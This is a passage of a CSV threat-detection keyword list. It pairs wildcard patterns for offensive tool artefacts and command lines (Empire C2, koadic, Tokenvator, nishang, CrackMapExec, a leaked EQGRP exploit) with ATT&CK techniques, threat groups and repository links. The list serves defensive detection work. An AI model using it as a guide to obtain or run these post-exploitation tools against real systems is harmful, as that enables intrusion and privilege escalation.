T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*Empire Framework GUI*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire --server *","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*Empire.Agent.Coms.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.Jobs.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Empire.Agent.Stager.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*empire/client/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/downloads/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire/server/downloads/logs/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*empire_server.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empireadmin*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire-chain.pem*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*EmpireCORSMiddleware*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*Empire-GUI.git*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"*Empire-master*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire-priv.key*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Empire-Sponsors.git*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*empire-test-kalirolling*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*emptybowl.py*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*enable_persistence.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*Enable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*EnableRDesktopImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 